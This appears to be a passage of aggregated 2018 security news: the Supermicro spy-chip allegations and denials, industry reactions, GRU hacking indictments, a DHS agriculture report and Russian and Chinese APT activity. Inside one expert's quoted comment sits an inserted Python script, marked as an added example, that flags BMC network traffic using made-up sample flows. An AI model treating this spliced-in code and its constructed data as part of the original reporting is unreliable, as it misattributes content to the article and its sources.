“Like our partners in the UK, the National Cyber Security Centre, at this time we have no reason to doubt the statements from the companies named in the story,” the agency stated. “Information and communications technology supply chain security is core to DHS’s cybersecurity mission and we are committed to the security and integrity of the technology on which Americans and others around the world increasingly rely.”

No one has been able to independently confirm that the FBI has launched an investigation as a result of the discovery of spy chips, and a former Apple executive said the agency's representatives told him that they had never heard of this type of investigation.

Apple, Amazon and Super Micro have been contacted by Bloomberg several times while the article was being written, but they are not happy with the final result. While it's not uncommon for major companies to deny news reports, the statements issued by the tech giants named in the Bloomberg story stand out due to the fact that they are very detailed and attempt to show that the article is factually inaccurate.

“At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government,” Amazon said. “There are so many inaccuracies in ‎this article as it relates to Amazon that they’re hard to count.”

Apple claims it's disappointed that Bloomberg reporters have not been open to the possibility that their sources might be misinformed or wrong.

“Despite numerous discussions across multiple teams and organizations, no one at Apple has ever heard of this investigation. Businessweek has refused to provide us with any information to track down the supposed proceedings or findings. Nor have they demonstrated any understanding of the standard procedures which were supposedly circumvented,” Apple said.

For its part, Super Micro also denied knowing anything about a government investigation.

“The manufacture of motherboards in China is not unique to Supermicro and is a standard industry practice. Nearly all systems providers use the same contract manufacturers. Supermicro qualifies and certifies every contract manufacturer and routinely inspects their facilities and processes closely,” it stated.

China Tech Stocks Lenovo, ZTE Tumble After Chip Hack Report
7.10.2018 securityweek

HONG KONG (AP) — Chinese tech stocks Lenovo Group and ZTE Corp. tumbled in Hong Kong on Friday following a news report Chinese spies might have used chips supplied by another company to hack into U.S. computer systems.

Lenovo shares closed down 15.1 percent while ZTE lost 11 percent.

Bloomberg News cited unidentified U.S. officials as saying malicious chips were inserted into equipment supplied by Super Micro Computer Inc. to American companies and government agencies.

Lenovo, with headquarters in Beijing and Research Triangle Park, North Carolina, is the biggest global manufacturer of personal computers and has a growing smartphone brand.

"Super Micro is not a supplier to Lenovo in any capacity," said Lenovo in a statement. "Furthermore, as a global company we take extensive steps to protect the ongoing integrity of our supply chain."

A spokeswoman for ZTE, headquartered in Shenzhen in southern China, said she wasn't aware of the report.

The Chinese foreign ministry didn't respond to a request for comment.

Bloomberg said Chinese military operatives added components to Super Micro products made at factories in China. It said the components included code that caused the products to accept changes to their software and to connect to outside computers.

Super Micro, headquartered in San Jose, California, denied its products contained malicious chips.

"Supermicro has never found any malicious chips, nor been informed by any customer that such chips have been found," said a company statement.

Chinese tech companies face heightened scrutiny in the United States.

A 2012 report by a congressional panel said ZTE and Chinese rival Huawei Technology Ltd. were security risks and warned American telecoms companies not to buy their equipment.

ZTE faced possible bankruptcy this year after Washington imposed a seven-year ban on sales of U.S. technology to the company over its exports to Iran and North Korea. American authorities lifted the ban in July after ZTE paid a $1 billion fine, agreed to replace its executive team and hired U.S.-selected compliance officers.

West Accuses Russian Spy Agency of Scores of Attacks
7.10.2018 securityweek BigBrothers

LONDON (AP) — The West unleashed an onslaught of new evidence and indictments Thursday accusing Russian military spies of hacking so widespread that it seemed to target anyone, anywhere who investigates Moscow's involvement in an array of criminal activities — including doping, poisoning and the downing of a plane.

Russia defiantly denied the charges, neither humbled nor embarrassed by the exceptional revelations on one of the most high-tension days in East-West relations in years. Moscow lashed back with allegations that the Pentagon runs a clandestine U.S. biological weapons program involving toxic mosquitoes, ticks and more.

The nucleus of Thursday's drama was Russia's military intelligence agency known as the GRU, increasingly the embodiment of Russian meddling abroad.

In the last 24 hours: U.S. authorities charged seven officers from the GRU with hacking international agencies; British and Australian authorities accused the GRU of a devastating 2017 cyberattack on Ukraine, the email leaks that rocked the U.S. 2016 election and other damaging hacks; and Dutch officials alleged that GRU agents tried and failed to hack into the world's chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons.

The ham-handed attempted break-in — involving hacking equipment in the trunk of a car and a trail of physical and virtual clues — was the most stunning operation revealed Thursday. It was so obvious, in fact, that it almost looked like the Russians didn't care about getting caught.

"Basically, the Russians got caught with their equipment, people who were doing it, and they have got to pay the piper. They are going to have to be held to account," U.S. Defense Secretary James Mattis said in Brussels, where he was meeting with NATO allies.

Mattis said the West has "a wide variety of responses" available.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity.

Calling Russia a "pariah state," British Defense Secretary Gavin Williamson said: "Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them."

Deputy Foreign Minister Sergei Ryabkov of Russia said in a statement that the U.S. is taking a "dangerous path" by "deliberately inciting tensions in relations between the nuclear powers," adding that Washington's European allies should also think about it.

While the accusations expose how much damage Russia can do in foreign lands, through remote hacking and on-site infiltration — they also expose how little Western countries can do to stop it.

Russia is already under EU and U.S. sanctions, and dozens of GRU agents and alleged Russian trolls have already been indicted by the U.S. but will likely never be handed over to face American justice.

Still, to the Western public, Thursday may have been a pivotal day, with accusations so extensive, and the chorus of condemnation so loud, that it left little doubt of massive Russian wrongdoing. A wealth of surveillance footage released by Western intelligence agencies was quickly and overwhelmingly confirmed by independent reporting.

The litany of accusations of GRU malfeasance began overnight, when British and Australian authorities accused the Russian agency of being behind the catastrophic 2017 cyberattack in Ukraine. The malicious software outbreak knocked out ATMs, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, caused $10 billion in damage worldwide.

The British and Australians also linked the GRU to other hacks, including the Democratic Party email leaks and online cyber propaganda that sowed havoc before Americans voted in the 2016 presidential election.

Later Thursday, Dutch defense officials released photos and a timeline of GRU agents' botched attempt to break into the chemical weapons watchdog using Wi-Fi hacking equipment hidden in a car parked outside a nearby Marriott Hotel. The OPCW was investigating a nerve agent attack on a former GRU spy, Sergei Skripal, and his daughter in Salisbury, England, that Britain has blamed on the Russian government. Moscow vehemently denies involvement.

Photographs released by the Dutch Ministry of Defense showed a trunk loaded with a computer, battery, a bulky white transformer and a hidden antenna; officials said the equipment was operational when Dutch counterintelligence interrupted the operation.

What Dutch authorities found seemed to be the work of an amateur. A taxi receipt in the pocket of one of the agents showed he had hired a cab to take him from a street next to GRU headquarters to Moscow's Sheremetyevo Airport. A laptop found with the team appeared to tie them to other alleged GRU hacks.

The men were expelled instead of arrested, because they were traveling on diplomatic passports.

The Dutch also accused the GRU of trying to hack investigators examining the 2014 downing of a Malaysian Airlines jetliner over eastern Ukraine that killed all 298 people on board. A Dutch-led team says it has strong evidence the missile that brought the plane down came from a Russia-based military unit. Russia has denied the charge.

Later Thursday, the U.S. Justice Department charged seven GRU officers — including the four caught in The Hague — in an international hacking rampage that targeted more than 250 athletes, a Pennsylvania-based nuclear energy company, a Swiss chemical laboratory and the OPCW.

The indictment said the GRU chose its targets because they had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned what they called a state-sponsored doping program by Russia.

U.S. prosecutors said the Russians also targeted a Pennsylvania-based nuclear energy company and the OPCW.

The seven were identified as: Aleksei Morenets, 41; Evgenii Serebriakov, 37; Ivan Yermakov, 32; Artem Malyshev, 30; and Dmitriy Badin, 27; who were each assigned to Military Unit 26165, and Oleg Sotnikov, 46, and Alexey Minin, 46, who were also GRU officers.

The U.S. indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The World Anti-Doping Agency, the U.S. Anti-Doping Agency and the Canadian anti-doping agency were all identified by the U.S. indictment against the Russians.

WADA said the alleged hackers "sought to violate athletes' rights by exposing personal and private data — often then modifying them — and ultimately undermine the work of WADA and its partners in the protection of clean sport."

Travis Tygart, the CEO of the U.S. anti-doping agency and a prominent critic of Russian athletes' drug use, says "a system that was abusing its own athletes with an institutionalized doping program has now been indicted for perpetrating cyberattacks on innocent athletes from around the world."

Russia denied everything.

Konstantin Kosachev, the head of the foreign affairs committee in the upper house of Russian parliament, said the accusations were fake and intended to "delegitimize" a resurgent Russia. The West has picked up the GRU as "a modern analogue of the KGB which served as a bugaboo for people in the West during the Cold War," he said.

Russia countered with accusations of their own: The Defense Ministry unveiled complex allegations that the U.S. has a clandestine biological weapons lab in the country of Georgia as part of a network of labs on the edges of Russia and China that flout international rules.

Pentagon spokesman Eric Pahon called the accusations "an invention" and "obvious attempts to divert attention from Russia's bad behavior on many fronts."

The Associated Press, meanwhile, independently corroborated information that matches details for two of the alleged Russian agents named by the Dutch authorities.

An online car registration database in Russia showed that Aleksei Morenets, whose full name and date of birth are the same as one of the expelled Russians, sold his car in 2004, listing the Moscow address where the Defense Ministry's Military University is based.

Alexey Minin, another Russian whose full name and date of birth match the Dutch details, had several cars, including an Alfa Romeo, that were registered and sold at the address where the Defense Ministry's GRU school is located. In some of the filings, Minin listed the official military unit number of the GRU school as his home address.

Industry Reactions to Chinese Spy Chips: Feedback Friday
7.10.2018 securityweek

Bloomberg reported this week that the Chinese government planted tiny chips in Super Micro servers to spy on Amazon, Apple and tens of other important organizations in the United States.

The spy chips allegedly made it into devices made by California-based Super Micro after Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built.

Once the chips were planted, they would reportedly allow attackers to remotely access the compromised devices. According to Bloomberg, the operation was conducted by the Chinese military and it targeted over 30 organizations, including government agencies and tech giants. Amazon, Apple and Super Micro have all denied the allegations.


Industry professionals contacted by SecurityWeek have commented on various aspects of the story, including the technical details, political impact, and how organizations can defend themselves against such attacks.

And the feedback begins...

Ian Pratt, co-founder and president, Bromium:

"From the publicly available information it sounds like the implant was intended to compromise the Baseboard Management Controller (BMC) that is present on most server hardware to allow remote management over a network. The BMC has a lot of control over the system. It can provide remote keyboard/video/mouse access to the system over the network. It also typically has access to lots of information about the host, such as its name, domain, IP addresses etc, and can query other information from the host via SNMP. The BMC can also be used to upgrade or modify the firmware used by the main CPU and Management Engine (ME), providing a great scope for stealthy malfeasance.

Based on the photographs, the device appears to be an SPI bus interposer, which would be inserted into the SPI bus between the BMC and the flash memory chip it boots from. A serial interface like SPI is very convenient for this purpose as it requires few pins (6), and hence a small and unobtrusive chip can be used. The implant likely contains a small firmware image that is served up to the BMC when it boots, in preference to the real firmware. Once that special image is running on the BMC, it likely puts the implant into pass-through mode and then loads the real firmware, but the special implanted code will stay resident within the BMC, controlling its actions.

It is likely that the implant would have had very limited functionality built directly into it. It would rely on communicating over the internet to a command and control server where it would report information about the machine it was resident on (such as the domain and network), and then receive instructions. I would expect/guess that out of the box it could have enabled the remote video/keyboard to the attacker, and would have been able to download additional code modules that it could store in BMC flash and use for other kinds of exploitation.

This communication with the C&C server is vulnerable to observation, and is quite likely how the implant was discovered -- rather more probable than someone spotting the tiny extra chip.”
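Pratt's closing point, that an implant in the BMC still has to beacon to a command-and-control server and that this traffic is observable, translates directly into a network check. The following is an added example, not code from the article or from Bromium: it scans constructed flow records and alerts on any BMC that initiates a connection outside its expected management destinations. The BMC subnet, the destination allowlist and every flow record are constructed for the example.

```python
"""Flag out-of-band (BMC) management interfaces talking to unexpected hosts.

Added example, not from the original article. A BMC on a dedicated management
network should only ever initiate traffic to a handful of known destinations;
anything else, and above all a connection to a public address, is the pattern
a firmware implant needs in order to reach its C&C server.
"""
import ipaddress
from dataclasses import dataclass

# Constructed: the dedicated out-of-band management network where BMCs live.
BMC_NET = ipaddress.ip_network("10.200.0.0/24")

# Constructed: the only (destination, port) pairs a BMC is expected to initiate
# traffic to: management console, syslog collector and NTP.
ALLOWED_DESTS = {
    (ipaddress.ip_address("10.200.0.5"), 443),   # management console
    (ipaddress.ip_address("10.200.0.6"), 514),   # syslog collector
    (ipaddress.ip_address("10.200.0.7"), 123),   # NTP
}

# RFC 1918 ranges; anything outside them is treated as external to the site.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


@dataclass
class Alert:
    src: str
    dst: str
    dport: int
    severity: str
    reason: str


def parse_flow(line):
    """Parse one constructed flow record of the form 'src dst dport bytes'."""
    src, dst, dport, nbytes = line.split()
    return ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport), int(nbytes)


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def flag_bmc_egress(lines):
    """Return an Alert for every BMC-initiated flow that leaves the allowlist."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, dport, _ = parse_flow(line)
        if src not in BMC_NET:
            continue  # only flows initiated by a BMC are of interest here
        if (dst, dport) in ALLOWED_DESTS:
            continue
        if not is_internal(dst):
            # A BMC has no reason to open connections to the internet;
            # this is the beaconing an implant would have to perform.
            alerts.append(Alert(str(src), str(dst), dport, "high",
                                "BMC initiated a connection to an external address"))
        else:
            alerts.append(Alert(str(src), str(dst), dport, "medium",
                                "BMC contacted an internal host outside the management allowlist"))
    return alerts


# Constructed flow records: 'src dst dport bytes'. Two of them should alert.
SAMPLE_FLOWS = """
# src            dst             dport  bytes
10.200.0.21      10.200.0.5      443    18240
10.200.0.21      10.200.0.7      123    96
10.200.0.22      10.200.0.6      514    3312
10.200.0.22      203.0.113.45    443    1207
10.200.0.23      10.10.5.40      445    52100
10.10.5.40       203.0.113.45    443    8801
""".strip().splitlines()


if __name__ == "__main__":
    for a in flag_bmc_egress(SAMPLE_FLOWS):
        print(f"[{a.severity}] {a.src} -> {a.dst}:{a.dport}  {a.reason}")
```

The last sample flow comes from an ordinary host rather than a BMC and is deliberately not flagged; the check is narrow on purpose, since a management network with a tight allowlist is what makes the beacon stand out.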

Jack Jones, Co-Founder and Chief Risk Scientist, RiskLens:

“We all know that the Chinese have been persistent in their campaigns to steal intellectual property and government intelligence through digital infiltration. We’ve also always known that hardware backdoors are a potential vector for this activity. In fact, many information security professionals have been warning of this for years. Why then, have companies and government agencies continued to purchase vast amounts and varieties of technologies from China?

If we put ourselves in the shoes of a business executive or agency head the answer is fairly obvious — cost savings. They have limited resources with which to achieve their objectives. Yes, their security team may have whispered (or shouted) in their ear of the dangers, but our profession has long suffered from a Chicken Little image. After a while, the myriad “high risks” all start to become an abstract blur in an executive’s mind — as opposed to the clarity of, for example, a 10% lower price with a Chinese product. What decision-makers haven’t had is a way to appropriately weigh these cost saving decisions against the risk implications.

Obviously, while the jury is still out (in some people’s minds) about the veracity and effect of this latest Chinese incursion, it should still serve as a wake-up call. We have to do a much better job of defining, evaluating and communicating loss event scenario probabilities and impacts so that decision-makers can make better-informed decisions. It shouldn’t take a digital "bullet to the knee" before exposures like this are taken seriously.”

Brian Vecci, Technical Evangelist, Varonis:

“This attack is about as surprising as catching Cookie Monster with his hand in the cookie jar. Compromising digital assets has become industrialized with advanced threats’ careful planning and organization. These threat actors are playing a long game with pre-attacks like these that position themselves for devastating attacks down the road – they are testing their abilities and an organization’s vulnerabilities to see how far they can go. What is surprising is that it has only taken a decade or two for the digital world to become so inter-dependent – not just with hardware but with software -- today many systems have so much code in common that any upstream compromise is a widespread threat.
Yes, executives at top companies should be concerned, but they should have been concerned yesterday. CISOs should operate under the assumption that they have live vulnerabilities on their network at all times because chances are they either have their own Edward Snowden on their hands or are exposed to external adversaries ranging from a basement script kiddie to a nation state-sponsored APT. Monitoring, both deeply and broadly, and useful security analytics that combine different data sources are the only way these kinds of threats will ever be detected or controlled. Companies have to start understanding that they can't sit around and patch their way to a secure network. On a positive note, now that this vulnerability has been detected, it’s going to get harder to fly under the radar because companies will know what to look for.”

Sanjay Beri, CEO, Netskope:

“Chinese cyber infiltration is nothing new, as proven by ongoing recent attacks from elite Chinese institutions diligently working to gain access to assets from the west. Today’s news proves that it’s clear we have exited the honeymoon period created by the deal President Obama struck with President Xi Jinping back in 2015, where the two pledged that each of their governments would refrain from targeted cyber attacks toward the other for commercial gain.

As economic tensions continue to escalate between nation states and the US, organizations -- especially those operating in high-risk sectors such as energy, manufacturing, government, etc. -- need to remain watchful and on high-alert in order to ensure their sensitive data is protected and inaccessible to foreign entities. Given the nature of this attack was at the hardware level, there are bound to be even more complex ramifications of those affected, as these types of breaches are far less simple to rectify than those at the software level.”

Itzik Kotler, CTO and Co-Founder, SafeBreach:

“Like many recent attacks, this is low-level, stealthy, and widespread. The combination of these three makes it especially frightening at first, and it certainly is rare to see such an attack in the wild.

However, no attack is ever a "one and done" operation. Even a compromised server isn't, by itself, a success for an attacker. Stolen data always needs to be retrieved. Or that server needs to be used to download, install, or run further attacks. It's for these reasons that enterprises employ layered defense, or "defense in depth" strategies that try to stop attacks at various points throughout their environment.

We must assume that no security, at any point, is 100% effective - and this attack is just another example. However, with the right layered defense, validated to ensure it's working as intended, even something like a hardware attack doesn't end up becoming a single point of failure.”

Dave Weinstein, VP Threat Research, Claroty:

“While the denials from Apple and Amazon have been relatively unprecedented in their strength and specificity, the reality is that the supply chain – for everything from consumer products, to technology, to heavy machinery – has been a perpetual source of concern for many years as a morass of potential exposure, and one that renders most security tools obsolete.

Regardless of where the claims of the story shake out, there are two immutable facts. First, we have a preponderance of evidence that supply chain compromise is not only possible at multiple levels, it’s happening. Second, China has proven its willingness to pursue advantage by any means necessary, and as the world's de-facto factory of IT components, this is the “high ground” advantage that they are willing to exploit. Likely even more willing given recent developments in trade policy between the U.S. and China.”

Rick Moy, Chief Marketing Officer at Acalvio:

"While there’s a lot of denial about the attacks, it’s completely plausible that China did in fact seed certain hardware with these backdoor chips. One can imagine the liabilities that firms would rather not take on by admitting this kind of a breach. However, it is entirely within the capabilities and mission scope of nation state intel armies to infiltrate supply chains in this way. Although, the ramifications are more serious than embedding malicious software because they could bring wholesale sanctions against the vendors in question, which is what we have been seeing on an informal basis for a while now."

Joseph Carson, chief security scientist at Thycotic:

“We are one step away from a major cyber conflict or retaliation that could result in serious implications. This could be one of the biggest hacks in history. What is clear is that it is a government behind this cyber espionage and I believe it is compromised employees with privileged access that are acting as malicious insiders selecting specific targets so the supply chain has been victim of being compromised. The motive will not be clear until exact details of the hardware chip are reversed to know what it is capable of and who the victims are, since no one is owning up from any of Super Micro’s customers.

It is too early to tell until more evidence is made transparent and any victims own up to this. What is clear is that Super Micro must conduct an Incident Response to determine the actual evidence behind these allegations so that transparency and a motive is revealed and that the nation state behind such compromise can be held responsible.”

Malcolm Harkins, Chief Security and Trust Officer, Cylance:

“Unfortunately the only surprising element about this attack is that it’s taken so long to be uncovered in a report. Supply chain compromise has been a concern for a long time, and there are multiple nation states with endless motivations who make attacks of this scale a certainty rather than a probability.

Adversaries have a wealth of choices of how to execute. From leaving extra bits in software to compromising a validation engineer, the options are endless if the threat actor has the time, money, and capacity. Organizations must combat this by remaining vigilant about where the hardware and software has been. Some software such as the BIOS and firmware is often written by external sources and not the hardware manufacturer. If you have a distrust for the location that it is being created, or are uncertain about the security validation performed, then you need to implement additional validation or in some cases different validation. As evidenced by Meltdown/Spectre, the hardware industry including the semiconductor industry has historically validated technology by testing for the functionality they want to see exist rather than exploring potentially dangerous alternatives that can create harm. Simply put, companies are essentially testing a light switch to see if it turns on and off when it goes up and down, but they’re ignoring the implications of switching it left and right.

Historically speaking, this level of testing has not been done because nobody has demanded it. Extra validation costs extra dollars and slows down time to market. Similar to the age-old Ford Pinto case, organizations are looking at business risks to themselves rather than the risk to the computing ecosystem and therefore society. Until this way of thinking changes, we will continue to see the potential for nation-state exploits such as this one.”

Tim Bandos, Vice President, Cybersecurity, Digital Guardian:

“Given the fact that China manufactures many of the components that go into servers, it would be relatively simple to install and disguise a hidden chip enabling backdoor communications and control with those endpoints. Also, given where these chips reside – lower in the stack – most technologies such as EDR and AV have a visibility gap and wouldn't be able to identify anything being tampered with at the hardware level. This (once again) demonstrates that determined adversaries have capabilities exceeding that of defenders; hopefully, this will inspire the development of methods and techniques to detect when hardware tampering has taken place. Until then, diversifying supply chain vendors and staying vigilant on outbound and inbound network traffic is highly advised.”

Neelima Rustagi, Senior Director, Product Management, Demisto:

"Although the veracity of the accusations has yet to be confirmed, it highlights a couple of worrying security trends. Firstly, no abstraction layer is safe from attack. While intrusions on the application, OS, and software layer are more visible and get talked about more, attacks that exploit hardware such as the recent Foreshadow attack can be tougher to spot for security tools. Secondly, organizations need to think of ‘supply chain security’ in addition to product/network security. Since product manufacture today straddles across nations and industries – each with their own regulations, mores, and political climates – organizations should be cognizant of processes, vendor relationships, and regulatory requirements for each step of the product lifecycle."

DHS Warns of Threats to Precision Agriculture
7.10.2018 securityweek

Relying on various embedded and connected technologies to improve agricultural and livestock management, precision agriculture is exposed to vulnerabilities and cyber-threats, a new report from the United States Department of Homeland Security (DHS) warns.

The adoption of precision agriculture technology has increased, which has also introduced various cyber risks. By exploiting vulnerabilities in precision agriculture technologies, an attacker could not only access sensitive data and steal resources, but also tamper with or destroy equipment.

Technologies used in precision agriculture “rely on remote sensing, global positioning systems, and communication systems to generate big data, data analytics, and machine learning,” the DHS report (PDF) says.

The findings of the report stem from visits and interviews at large farms and precision agriculture technology manufacturers in the United States. Technologies that allow for a more precise application of agricultural and livestock management inputs (fertilizer, seeds, and pesticides) to lower costs and improve yields also expose the agricultural sector to vulnerabilities, the paper reads.

Cyber threats facing precision agriculture’s embedded and digital tools, however, are consistent with those other connected industries are exposed to as well. The malicious attacks targeting these tools usually have the same purpose too, including data and resource theft, reputation loss, destruction of equipment, or gaining an improper financial advantage over a competitor.

“Therefore, improper use of USB thumb drives, spear-phishing, and other malicious cyber-attacks, are readily available threat vectors for an attack; and the generally accepted mitigation techniques in other industries are largely sufficient for creating a successful defense-in-depth strategy for precision agriculture,” the report notes.

What makes precision agriculture unique, however, is the fact that a highly mechanical labor-intensive industry is now connected online, which dramatically increases the attack surface for threat actors. Thus, threats that would otherwise be viewed as common, “may have unique and far-reaching consequences on the agricultural industry,” the DHS says.

According to the report, precision agriculture isn’t only exposed to cyber-attacks, but also faces dangers such as natural disasters, terrorist attacks, equipment breakdown, or insider threats.

Key threats to the sector include intentional theft of data, intentional publishing of confidential information, access to unmanned aerial system (UAS) data, sale of confidential data, falsification of data for disruption purposes, introduction of rogue data to damage a crop or herd, disruption to positioning, navigation, and timing (PNT) systems, and disruption to communication networks.

The report also lists a series of key controls designed to mitigate the threats: email and browser protections, control over network ports and hardware and software assets, account monitoring, data recovery capabilities, data protection, and incident response and management, among others.

“Adoption of information security standards for precision agriculture is important for the future success of precision agriculture, along with industry efforts for equipment interoperability and data use / privacy. Vetted best practices, borne from hard experience learned in other sectors which have proceeded agriculture in the digital revolution, offer a proven path for data security,” the report reads.

Russian State-Sponsored Operations Begin to Overlap: Kaspersky
7.10.2018 securityweek

Kaspersky Lab security researchers have uncovered new evidence that shows overlaps between the activity of infamous Russian cyber-espionage groups Turla and Sofacy.

Earlier this year, Kurt Baumgartner, principal security researcher, Kaspersky Lab, revealed that activity associated with the Sofacy group, which is also known as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, appeared to overlap with that of other state-sponsored operations.

The researcher said at the time that Sofacy’s Zebrocy malware had been discovered on machines also infected with Mosquito, a backdoor previously associated with Turla. The shared victims included organizations in Europe and Asia.

Amid an evolution in the tactics, techniques and procedures (TTPs) employed by the Turla group, also tracked as Snake, Venomous Bear, Waterbug, and Uroboros, Kaspersky Lab has observed further connections with Sofacy, as well as more evidence linking Turla to WhiteBear.

Specifically, the security researchers discovered that Turla’s KopiLuwak malware is employing a delivery mechanism that uses code nearly identical to that previously seen in the Zebrocy operation.

As part of the attack, Turla employed a new spear-phishing delivery vector, relying on Windows shortcut (.LNK) files for malware delivery. The LNK file, Kaspersky discovered, contained PowerShell code almost identical to that used in Zebrocy activity a month earlier.

The investigation also uncovered target overlaps between the two threat actors, focused on sensitive political targets, including government research and security entities, diplomatic missions and military affairs, mainly in central Asia.

The KopiLuwak malware isn’t new, being first associated with the Turla hackers nearly two years ago. In mid-2018, however, the threat actor started using an evolved variant of the malware, targeting entities in Syria and Afghanistan.

KopiLuwak emerged in 2016 as an evolution from IcedCoffee, Turla’s first foray into full-fledged JavaScript backdoors. Focusing on European governments but more selectively deployed, KopiLuwak performs comprehensive system and network reconnaissance, can run arbitrary system commands and uninstalls itself and leaves little evidence for investigators to work with.

In a newly published report, Kaspersky details the discovery and also provides information on the evolution of the KopiLuwak JavaScript backdoor, along with details on the changes observed in the group’s Carbon framework and in the Meterpreter and Mosquito malware delivery techniques.

Turla is expected to continue to update and use the Carbon framework code into 2019 within Central Asia and related remote locations. The group is also expected to use open-source based or inspired fileless components and memory loaders from the Mosquito malware, Kaspersky says.

“It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group,” Kaspersky notes.

US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
6.10.2018 securityaffairs 

The US DoJ has indicted seven defendants working for the Russian Main Intelligence Directorate (GRU) for hacking, wire fraud, identity theft, and money laundering.

The defendants are Aleksei Sergeyevich Morenets, Evgenii Mikhaylovich Serebriakov, Ivan Sergeyevich Yermakov, Artem Andreyevich Malyshev, and Dmitriy Sergeyevich Badin, who work for Military Unit 26165, and GRU officers Oleg Mikhaylovich Sotnikov and Alexey Valerevich Minin.

The hackers were involved in a cyber operation aimed at discrediting the international anti-doping organizations and officials that had revealed the athlete doping program sustained by Moscow.

The GRU officers hacked into the accounts of officials at the anti-doping organizations to steal confidential data and leak it in order to delegitimize them.

According to prosecutors, the defendants also attempted to spread fake news about doping programs followed by athletes from other countries.

“According to the indictment, beginning in or around December 2014 and continuing until at least May 2018, the conspiracy conducted persistent and sophisticated computer intrusions affecting U.S. persons, corporate entities, international organizations, and their respective employees located around the world, based on their strategic interest to the Russian government.” reads the DoJ press release.

“State-sponsored hacking and disinformation campaigns pose serious threats to our security and to our open society, but the Department of Justice is defending against them,” said Attorney General Jeff Sessions. “Today we are indicting seven GRU officers for multiple felonies each, including the use of hacking to spread the personal information of hundreds of anti-doping officials and athletes as part of an effort to distract from Russia’s state-sponsored doping program. The defendants in this case allegedly targeted multiple Americans and American entities for hacking, from our national anti-doping agency to the Westinghouse Electric Company near Pittsburgh. We are determined to achieve justice in these cases and we will continue to protect the American people from hackers and disinformation.”

The Russian state-sponsored hackers spread fake news via social media accounts and other infrastructure acquired and maintained by GRU Unit 74455 in Russia.

The cyber spies were operating under the name of a false hacktivist group calling itself the “Fancy Bears’ Hack Team.”

“As part of its influence and disinformation efforts, the Fancy Bears’ Hack Team engaged in a concerted effort to draw media attention to the leaks through a proactive outreach campaign,” continues the press release.

“The conspirators exchanged e-mails and private messages with approximately 186 reporters in an apparent attempt to amplify the exposure and effect of their message.”

The indictments of the seven GRU members are the latest in a string of similar actions against Russian agents involved in hacking activities.

In July, Special Counsel Robert Mueller, who in February indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

DHS issued an alert on attacks aimed at Managed Service Providers
6.10.2018 securityaffairs 

The United States Department of Homeland Security (DHS) has issued an alert warning of ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).

Managed services are the practice of outsourcing, on a proactive basis, certain processes and functions intended to improve operations and cut expenses. It is an alternative to the break/fix or on-demand outsourcing model, in which the service provider performs services on demand and bills the customer only for the work done.

The use of MSPs increases the attack surface available to attackers. The DHS alert, TA18-276B, relates to activity that was uncovered by DHS’ National Cybersecurity and Communications Integration Center (NCCIC) in April 2017.

“The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs).” reads the alert issued by DHS.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.”

Security firms have attributed the attacks to a Chinese threat actor referred to as APT10 (aka menuPass and Stone Panda).


The group has been active since at least 2009. In April 2017, experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware had already been seen in the previous attack as a beta version or release candidate. In September, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at the Japanese media sector.

The hackers used a broad range of malware in their campaigns, including PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler, and ZeroT.

The DHS alert also provides technical information on detection, response and mitigation for this specific threat.

China planted tiny chips on US computers for cyber espionage

5.10.2018 securityaffairs BigBrothers

According to a report published by Bloomberg News, China used tiny chips implanted on computer equipment manufactured for US companies and government agencies, including Amazon and Apple, to steal secret information.

The tiny chips are the size of a grain of rice; they were discovered during an investigation that started three years ago and is still ongoing.

“Nested on the servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community.” reads the report.


The tiny chips were used as a “stealth doorway” into computer equipment, a hardware backdoor very hard to detect.

According to unnamed US officials cited in the report, the spying hardware was designed by a unit of the People’s Liberation Army and was inserted on equipment manufactured in China for US-based Super Micro Computer Inc.

Amazon discovered the tiny chips when it acquired software firm Elemental and conducted a security assessment of equipment made for Elemental by California-based Supermicro.

Elemental manufactured equipment for Department of Defense data centers, the CIA’s drone operations, and onboard networks of Navy warships.

“Elemental also started working with American spy agencies. In 2009 the company announced a development partnership with In-Q-Tel Inc., the CIA’s investment arm, a deal that paved the way for Elemental servers to be used in national security missions across the U.S. government.” continues the report.

